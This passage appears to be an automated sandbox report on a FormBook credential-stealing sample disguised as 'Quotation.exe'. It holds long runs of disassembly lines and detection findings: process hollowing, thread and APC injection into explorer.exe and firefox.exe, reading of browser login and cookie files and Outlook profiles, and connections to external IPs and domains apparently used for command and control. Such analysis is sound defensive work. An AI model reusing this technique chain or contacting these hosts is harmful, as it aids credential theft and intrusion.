Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353965A mov eax, dword ptr fs:[00000030h] 10_2_3353965A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356265C mov eax, dword ptr fs:[00000030h] 10_2_3356265C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356265C mov ecx, dword ptr fs:[00000030h] 10_2_3356265C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356265C mov eax, dword ptr fs:[00000030h] 10_2_3356265C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33533640 mov eax, dword ptr fs:[00000030h] 10_2_33533640
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h] 10_2_3354F640
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h] 10_2_3354F640
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h] 10_2_3354F640
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356C640 mov eax, dword ptr fs:[00000030h] 10_2_3356C640
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356C640 mov eax, dword ptr fs:[00000030h] 10_2_3356C640
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352D64A mov eax, dword ptr fs:[00000030h] 10_2_3352D64A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352D64A mov eax, dword ptr fs:[00000030h] 10_2_3352D64A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33530670 mov eax, dword ptr fs:[00000030h] 10_2_33530670
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572670 mov eax, dword ptr fs:[00000030h] 10_2_33572670
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572670 mov eax, dword ptr fs:[00000030h] 10_2_33572670
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33527662 mov eax, dword ptr fs:[00000030h] 10_2_33527662
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33527662 mov eax, dword ptr fs:[00000030h] 10_2_33527662
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33527662 mov eax, dword ptr fs:[00000030h] 10_2_33527662
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356666D mov esi, dword ptr fs:[00000030h] 10_2_3356666D
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356666D mov eax, dword ptr fs:[00000030h] 10_2_3356666D
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356666D mov eax, dword ptr fs:[00000030h] 10_2_3356666D
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h] 10_2_335C3608
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h] 10_2_335C3608
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h] 10_2_335C3608
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h] 10_2_335C3608
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h] 10_2_335C3608
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h] 10_2_335C3608
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355D600 mov eax, dword ptr fs:[00000030h] 10_2_3355D600
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355D600 mov eax, dword ptr fs:[00000030h] 10_2_3355D600
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335EF607 mov eax, dword ptr fs:[00000030h] 10_2_335EF607
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356360F mov eax, dword ptr fs:[00000030h] 10_2_3356360F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33604600 mov eax, dword ptr fs:[00000030h] 10_2_33604600
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33530630 mov eax, dword ptr fs:[00000030h] 10_2_33530630
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33560630 mov eax, dword ptr fs:[00000030h] 10_2_33560630
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B8633 mov esi, dword ptr fs:[00000030h] 10_2_335B8633
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B8633 mov eax, dword ptr fs:[00000030h] 10_2_335B8633
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B8633 mov eax, dword ptr fs:[00000030h] 10_2_335B8633
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356F63F mov eax, dword ptr fs:[00000030h] 10_2_3356F63F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356F63F mov eax, dword ptr fs:[00000030h] 10_2_3356F63F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33537623 mov eax, dword ptr fs:[00000030h] 10_2_33537623
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DD62C mov ecx, dword ptr fs:[00000030h] 10_2_335DD62C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DD62C mov ecx, dword ptr fs:[00000030h] 10_2_335DD62C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DD62C mov eax, dword ptr fs:[00000030h] 10_2_335DD62C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33535622 mov eax, dword ptr fs:[00000030h] 10_2_33535622
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33535622 mov eax, dword ptr fs:[00000030h] 10_2_33535622
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356C620 mov eax, dword ptr fs:[00000030h] 10_2_3356C620
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355D6D0 mov eax, dword ptr fs:[00000030h] 10_2_3355D6D0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335306CF mov eax, dword ptr fs:[00000030h] 10_2_335306CF
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FA6C0 mov eax, dword ptr fs:[00000030h] 10_2_335FA6C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335D86C2 mov eax, dword ptr fs:[00000030h] 10_2_335D86C2
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AC6F2 mov eax, dword ptr fs:[00000030h] 10_2_335AC6F2
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AC6F2 mov eax, dword ptr fs:[00000030h] 10_2_335AC6F2
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335296E0 mov eax, dword ptr fs:[00000030h] 10_2_335296E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335296E0 mov eax, dword ptr fs:[00000030h] 10_2_335296E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353C6E0 mov eax, dword ptr fs:[00000030h] 10_2_3353C6E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h] 10_2_335356E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h] 10_2_335356E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h] 10_2_335356E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335566E0 mov eax, dword ptr fs:[00000030h] 10_2_335566E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335566E0 mov eax, dword ptr fs:[00000030h] 10_2_335566E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33538690 mov eax, dword ptr fs:[00000030h] 10_2_33538690
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335BC691 mov eax, dword ptr fs:[00000030h] 10_2_335BC691
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335EF68C mov eax, dword ptr fs:[00000030h] 10_2_335EF68C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 mov eax, dword ptr fs:[00000030h] 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F86A8 mov eax, dword ptr fs:[00000030h] 10_2_335F86A8
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F86A8 mov eax, dword ptr fs:[00000030h] 10_2_335F86A8
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FA553 mov eax, dword ptr fs:[00000030h] 10_2_335FA553
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354E547 mov eax, dword ptr fs:[00000030h] 10_2_3354E547
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33566540 mov eax, dword ptr fs:[00000030h] 10_2_33566540
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33568540 mov eax, dword ptr fs:[00000030h] 10_2_33568540
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353254C mov eax, dword ptr fs:[00000030h] 10_2_3353254C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354C560 mov eax, dword ptr fs:[00000030h] 10_2_3354C560
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3360B55F mov eax, dword ptr fs:[00000030h] 10_2_3360B55F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3360B55F mov eax, dword ptr fs:[00000030h] 10_2_3360B55F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33551514 mov eax, dword ptr fs:[00000030h] 10_2_33551514
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33551514 mov eax, dword ptr fs:[00000030h] 10_2_33551514
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33551514 mov eax, dword ptr fs:[00000030h] 10_2_33551514
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33551514 mov eax, dword ptr fs:[00000030h] 10_2_33551514
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33551514 mov eax, dword ptr fs:[00000030h] 10_2_33551514
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33551514 mov eax, dword ptr fs:[00000030h] 10_2_33551514
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335BC51D mov eax, dword ptr fs:[00000030h] 10_2_335BC51D
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov ecx, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov ecx, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h] 10_2_335DF51B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352B502 mov eax, dword ptr fs:[00000030h] 10_2_3352B502
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h] 10_2_3355E507
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33532500 mov eax, dword ptr fs:[00000030h] 10_2_33532500
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356C50D mov eax, dword ptr fs:[00000030h] 10_2_3356C50D
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356C50D mov eax, dword ptr fs:[00000030h] 10_2_3356C50D
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33533536 mov eax, dword ptr fs:[00000030h] 10_2_33533536
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33533536 mov eax, dword ptr fs:[00000030h] 10_2_33533536
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352753F mov eax, dword ptr fs:[00000030h] 10_2_3352753F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352753F mov eax, dword ptr fs:[00000030h] 10_2_3352753F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352753F mov eax, dword ptr fs:[00000030h] 10_2_3352753F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572539 mov eax, dword ptr fs:[00000030h] 10_2_33572539
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33561527 mov eax, dword ptr fs:[00000030h] 10_2_33561527
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356F523 mov eax, dword ptr fs:[00000030h] 10_2_3356F523
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354252B mov eax, dword ptr fs:[00000030h] 10_2_3354252B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354252B mov eax, dword ptr fs:[00000030h] 10_2_3354252B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354252B mov eax, dword ptr fs:[00000030h] 10_2_3354252B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354252B mov eax, dword ptr fs:[00000030h] 10_2_3354252B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354252B mov eax, dword ptr fs:[00000030h] 10_2_3354252B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354252B mov eax, dword ptr fs:[00000030h] 10_2_3354252B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354252B mov eax, dword ptr fs:[00000030h] 10_2_3354252B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335665D0 mov eax, dword ptr fs:[00000030h] 10_2_335665D0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356C5C6 mov eax, dword ptr fs:[00000030h] 10_2_3356C5C6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h] 10_2_3352F5C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B05C6 mov eax, dword ptr fs:[00000030h] 10_2_335B05C6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335BC5FC mov eax, dword ptr fs:[00000030h] 10_2_335BC5FC
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356A5E7 mov ebx, dword ptr fs:[00000030h] 10_2_3356A5E7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356A5E7 mov eax, dword ptr fs:[00000030h] 10_2_3356A5E7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353B5E0 mov eax, dword ptr fs:[00000030h] 10_2_3353B5E0
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 1_2_004057A2

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.184.0.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.194.145.38 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.192.26.35 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.215.156.6 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.117.168.233 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.196 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.83.160.9 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 208.91.197.91 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.17.29.148 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 88.212.206.251 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.212.220 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.58.118.167 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Quotation.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 5D0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Quotation.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\control.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF752290000 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\control.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF752290000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Quotation.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Quotation.exe Thread register set: target process: 4712 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 4712 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Quotation.exe Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CA42000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000C.00000000.22639249387.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26403643909.00000000004B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +ProgmanK
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403235

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830618 Sample: Quotation.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 38 www.texasgent.com 2->38 40 www.solya-shop.com 2->40 42 20 other IPs or domains 2->42 60 Snort IDS alert for network traffic 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 6 other signatures 2->66 11 Quotation.exe 1 38 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 11->30 dropped 32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 34 C:\Users\user\AppData\...\percentile.dll, PE32+ 11->34 dropped 36 5 other files (none is malicious) 11->36 dropped 78 Tries to detect Any.run 11->78 15 Quotation.exe 6 11->15         started        signatures6 process7 dnsIp8 50 www.wittofitentertainment.com 162.240.73.101, 443, 49854 UNIFIEDLAYER-AS-1US United States 15->50 52 Modifies the context of a thread in another process (thread injection) 15->52 54 Tries to detect Any.run 15->54 56 Maps a DLL or memory area into another process 15->56 58 2 other signatures 15->58 19 explorer.exe 2 1 15->19 injected signatures9 process10 dnsIp11 44 www.interactive-media.ru 88.212.206.251, 49858, 49921, 80 UNITEDNETRU Russian Federation 19->44 46 www.brightfms.com 81.17.18.196, 49909, 49910, 49911 PLI-ASCH Switzerland 19->46 48 12 other IPs or domains 19->48 68 System process connects to network (likely due to code injection or exploit) 19->68 23 control.exe 13 19->23         started        signatures12 process13 signatures14 70 Tries to steal Mail credentials (via file / registry access) 23->70 72 Tries to harvest and steal browser information (history, passwords, etc) 23->72 74 Writes to foreign memory regions 23->74 76 3 other signatures 23->76 26 firefox.exe 23->26         started        process15 process16 28 WerFault.exe 4 26->28         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.184.0.24
 www.b-tek.media Netherlands
197902 HOSTNETNL true
45.194.145.38
